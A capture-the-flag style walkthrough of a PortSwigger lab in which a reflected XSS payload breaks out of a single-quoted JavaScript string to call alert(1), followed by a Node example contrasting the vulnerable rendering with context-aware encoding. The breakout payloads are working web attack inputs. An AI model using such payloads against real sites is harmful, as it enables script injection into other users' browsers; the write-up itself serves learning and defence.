Reflected XSS into a JavaScript string with angle brackets HTML encoded


Marduk I Am

This is going to be the last in a series of nine apprentice-level Cross-Site Scripting (XSS) labs from PortSwigger Web Security Academy. In this lab we are going to be revisiting Reflected XSS. Reflected XSS arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way, so the payload travels in the URL and fires in the browser of whoever opens it.

Lab description: This lab contains a reflected cross-site scripting vulnerability in the search query tracking functionality where angle brackets are encoded. The reflection occurs inside a JavaScript string. To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the alert function.

It's a pretty straightforward lab where we are going to need to use the search bar to inject our payload. However, as the lab title indicates, we will not be able to use angle brackets (<>) within the payload: the application HTML-encodes them this time, so the usual <script> and <img onerror> tricks are out. The important detail is where the reflection lands. Our input ends up inside a JavaScript string, and in that context the character that matters is the single quote, not the angle bracket.

Access the lab and enter an alpha-numeric string in the search bar, that you know will yield 0 results, and hit enter.

Screenshot of our blog search bar

Now let’s inspect what is going on with this search function. Right click where your search string is displayed on the results page. Select Inspect.

0 search results for M4rdukWasH3re

This opens the DOM inspector with your search string highlighted. In the inspector's search bar, enter your search string again and hit enter. You should find it in three places: an HTML comment, the results heading, and a <script> block (plus the tracker <img> that the script writes).

DOM-browser screenshot with red arrows pointing and our search string in 3 places
<!-- M4rdukWasH3re -->
<section class="blog-header">
<h1>0 search results for 'M4rdukWasH3re'</h1>
<hr>
</section>
<script>
var searchTerms = 'M4rdukWasH3re';
document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>
<img src="/resources/images/tracker.gif?searchTerms=M4rdukWasH3re">

We are going to focus our attention on the <script>. Notice how our search string is wrapped in single quotes. Try adding one single quote to the end of your search string to see what happens. Then right click where your search string is displayed on the results page and select Inspect.

Search results page for M4rdukWasH3re’

Look at our search string in the <script> now. Our quote closed the string early and the application's own closing quote is left dangling, so the statement no longer parses and the browser refuses to run the block at all (notice that the tracker <img> is missing from the DOM below). We have broken out of the string; now all we have to do is put a payload after the quote that leaves the statement syntactically valid.

DOM-browser screenshot results for M4rdukWasH3re’
<!-- M4rdukWasH3re' -->
<section class="blog-header">
<h1>0 search results for 'M4rdukWasH3re''</h1>
<hr>
</section>
<script>
var searchTerms = 'M4rdukWasH3re'';
document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>

In order to solve the lab, we need to call the alert() function. In previous labs, we had to specify javascript:alert(). This time, however, we are already inside a JavaScript script, so we just need to splice a valid JavaScript expression into the existing statement. Whatever we add has to consume the application's trailing quote, otherwise we are back to the syntax error above.

There are a couple of ways we can do it (for example '-alert(1)-' also works). I'm going to concatenate it to my existing string using the (+) operator, with a trailing quote that pairs up with the one the application appends:

M4rdukWasH3re' + alert(1) + '

Enter your payload into the search bar and hit enter.

Screenshot of our pop-up!

Congratulations! You’ve solved another one. Keep up the good work!

Let’s look at what’s happening. Right click where your search string is displayed on the results page. Select Inspect.

Search result page for our payload of M4rdukWasH3re’ + alert(1) + ‘

Check it out. There is our payload sitting in the <script>, and the statement is valid JavaScript again: our leading quote closes the original string, alert(1) runs as part of the expression, and our trailing quote opens an empty string that the application's own quote closes. The last <img> below shows the side effect: alert() returns undefined, so searchTerms ends up as 'M4rdukWasH3reundefined' by the time it reaches the tracker URL. The angle-bracket encoding never came into play, which is the lesson of this lab: output encoding only protects you if it matches the context the data lands in.

<!-- M4rdukWasH3re' + alert(1) + ' -->
<section class="blog-header">
<h1>0 search results for 'M4rdukWasH3re' + alert(1) + ''</h1>
<hr>
</section>
<script>
var searchTerms = 'M4rdukWasH3re' + alert(1) + '';
document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>
<img src="/resources/images/tracker.gif?searchTerms=M4rdukWasH3reundefined">
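To make the context point concrete, here is an added Node example that models the lab's search page offline; it is not code from the lab or from the original post, and the server-side template it reconstructs (HTML-encode only < and >, then drop the value into a single-quoted JavaScript string) is an assumption based on the DOM dumps above. It runs the rendered script with alert() and document.write() stubbed, so you can see the vulnerable rendering fire the alert on our payload while a rendering that encodes for the JavaScript string context does not.

```javascript
// Added example, not from the PortSwigger lab or the original post. The
// server template below is an assumption reconstructed from the DOM shown in
// this write-up: only < and > are HTML-encoded, and the result is interpolated
// into a single-quoted JavaScript string literal.

// The tracker line is identical in both renderings; only the literal differs.
const TRACKER =
  `document.write('<img src="/resources/images/tracker.gif?searchTerms=' + ` +
  `encodeURIComponent(searchTerms) + '">');`;

// Vulnerable rendering (what the lab does): HTML-encode angle brackets only.
// Inside <script> the HTML parser never decodes entities, so &lt;script&gt;
// stays inert, but nothing stops a ' from terminating the JS string.
function renderVulnerable(searchTerm) {
  const encoded = searchTerm.replace(/</g, '&lt;').replace(/>/g, '&gt;');
  return `var searchTerms = '${encoded}';\n${TRACKER}`;
}

// Hardened rendering: encode for the JavaScript string context instead.
// JSON.stringify escapes quotes, backslashes and control characters; the
// extra replaces turn < and > into \u escapes so the literal can never
// contain "</script>", and neutralise the U+2028/2029 line terminators.
function renderFixed(searchTerm) {
  const literal = JSON.stringify(searchTerm)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return `var searchTerms = ${literal};\n${TRACKER}`;
}

// Run the rendered <script> body the way a browser would, with alert() and
// document.write() stubbed, and report what happened.
function execute(script) {
  const alerts = [];
  const written = [];
  const fakeDocument = { write: (html) => written.push(html) };
  try {
    const fn = new Function('alert', 'document', `${script}\nreturn searchTerms;`);
    const searchTerms = fn((x) => { alerts.push(x); }, fakeDocument);
    return { alerts, written, searchTerms, error: null };
  } catch (e) {
    // A lone quote leaves an unterminated literal: the whole block is a
    // SyntaxError and nothing in it runs, which is why the second DOM dump
    // in the write-up has no tracker <img>.
    return { alerts, written, searchTerms: undefined, error: e.name };
  }
}

// Try a payload against each rendering.
const attackVulnerable = (payload) => execute(renderVulnerable(payload));
const attackFixed = (payload) => execute(renderFixed(payload));

// Stand-alone demo with the write-up's payload.
const demoPayload = "M4rdukWasH3re' + alert(1) + '";
console.log(renderVulnerable(demoPayload));
console.log(attackVulnerable(demoPayload));   // alerts: [1], searchTerms ends in "undefined"
console.log(renderFixed(demoPayload));
console.log(attackFixed(demoPayload));        // alerts: [], searchTerms === demoPayload
```

Run it with `node` and compare the two rendered scripts: the vulnerable one is byte-for-byte the statement from the last DOM dump, while the fixed one wraps the same payload in a double-quoted literal where the single quotes are just data. Note that the fix is context-aware encoding, not blocking quotes; an input filter that strips ' would break legitimate searches and still leave the backslash and line-terminator cases for the next lab.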